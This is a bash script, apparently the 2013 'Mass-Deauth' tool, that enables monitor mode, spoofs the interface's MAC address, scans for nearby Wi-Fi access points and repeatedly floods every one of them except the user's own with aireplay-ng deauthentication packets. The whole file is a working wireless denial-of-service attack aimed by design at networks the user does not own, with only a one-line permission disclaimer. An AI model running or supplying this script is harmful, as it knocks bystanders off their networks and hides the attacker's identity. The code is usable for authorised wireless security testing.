#!/bin/bash
# Mass-Deauth Script by RFKiller <http://rfkiller.they.org>
# Mass-Deauth Script homepage <https://github.com/RFKiller/mass-deauth>
# Send all emails to <grant.c.stone@gmail.com>
# Copyright (c) GPLv3 - 2013 RFKiller
# Please see the LICENSE file that came with this program
# PLEASE USE THIS SCRIPT RESPONSIBLY.
# DO NOT USE ON NETWORKS YOU DON'T OWN OR DON'T HAVE PERMISSION TO ATTACK

########################### LET'S CHECK ID AT THE DOOR
if [[ $EUID -ne 0 ]]; then
	echo -e "\033[31m\n    [!] This script MUST be run as root. Aborting . . . [!]\033[0m\n" 1>&2
	sleep 1; exit 1
fi

########################### LET'S ALSO CHECK FOR REQUIRED PROGRAMS
for i in airmon-ng aireplay-ng iw ip iwlist macchanger; do
	command -v $i > /dev/null 2>&1 || {
		echo -e >&2 "\033[31m\n    [!] This script requires $i to be installed. Aborting . . . [!]\033[0m\n"
		sleep 1; exit 1
	}
done

########################### LOGICAL STUFF - don't touch unless you're 31337
version="0.2"
atk="0"
MIFACE="mon0"

clear
echo -e "\e[01;32m[+]\e[00m Setting up for attack . . ."

while [[ ! $WIFACE ]]; do
	echo -e "\033[33m[>] Type the wireless interface you'd like to use and hit [ENTER]:\033[0m"
	read -e WIFACE
	sleep 1; echo
done
while [[ ! $DEAUTHS ]]; do
	echo -e "\033[33m[>] How many deauthentication packets would you to send to each router?\033[0m"
	read -e DEAUTHS
	sleep 1; echo
done
while [[ ! $waitTime ]]; do
	echo -e "\033[33m[>] How long would you like to wait (in seconds) between attacks?\033[0m"
	read -e waitTime
	sleep 1; echo
done
while [[ ! $ourAPmac ]]; do
	echo -e "\033[33m[>] Enter the MAC address of your router (so we don't attack it):\033[0m"
	read -e ourAPmac
	sleep 1; echo
done
export ourAPmac

function rmlogs() {
	if [ -e "/tmp/scan.tmp" ]; then rm /tmp/scan.tmp ; fi
	if [ -e "/tmp/APmacs.lst" ]; then rm /tmp/APmacs.lst ; fi
	if [ -e "/tmp/APchannels.lst" ]; then rm /tmp/APchannels.lst ; fi
}
function cleanup() {
	echo -e "\n\n\033[31m[!] Killing aireplay-ng and $MIFACE . . .\033[0m"
	killall -9 aireplay-ng &> /dev/null
	airmon-ng stop $MIFACE
	echo -e "\033[31m[!] Removing logs and scan data . . .\033[0m\n"
	rmlogs
	echo -e "\033[32m    [!] Happy Hacking! [!]\033[0m\n"
	exit 0
}

trap cleanup INT
ip link set $WIFACE up &> /dev/null
rmlogs

while [[ ! $moncheck ]]; do
	ip link set $WIFACE up && airmon-ng start $WIFACE &> /dev/null
	moncheck=`iw dev | awk '$0 ~ /Interface / {print $2}' | grep $MIFACE`
done

echo -e "\e[01;32m[+]\e[00m Changing MAC Address . . ."
ip link set $MIFACE down && macchanger -A $MIFACE && ip link set $MIFACE up

scan1="0"

while true; do
	echo -e "\n\e[01;33m[!] Press [ CTRL+C ]  in this window to kill attack . . .\e[00m\n"
	rmlogs
	iwlist $WIFACE scan > /tmp/scan.tmp
	awk --posix '$5 ~ /[0-9a-zA-F]{2}:/ && $5 !~ /'$ourAPmac'/ {print $5}' /tmp/scan.tmp > /tmp/APmacs.lst
	cat /tmp/scan.tmp | grep "Channel:" | cut -b 29 > /tmp/APchannels.lst
	lineNum=`wc -l /tmp/APmacs.lst | awk '{ print $1}'`
	echo -e "\e[01;32m[>]\e[00m Deauthenticating $lineNum APs from scan data . . ."
	for (( b=1; b<=$lineNum; b++ )); do
			scan1="1"
			curCHAN=`cat /tmp/APchannels.lst | head -n $b`
			curAP=`sed -n -e ''$b'p' '/tmp/APmacs.lst'`
			echo -e "\e[01;32m[>]\e[00m Deauthenticating all clients on $curAP . . ."
			aireplay-ng -0 $DEAUTHS -D -a $curAP $MIFACE &> /dev/null &
	done
	atk="1"
	echo -e "\e[01;32m[>]\e[00m Sleeping for $waitTime seconds . . .\n" && sleep $waitTime
	for active in `jobs -p`; do
		wait $active
	done
done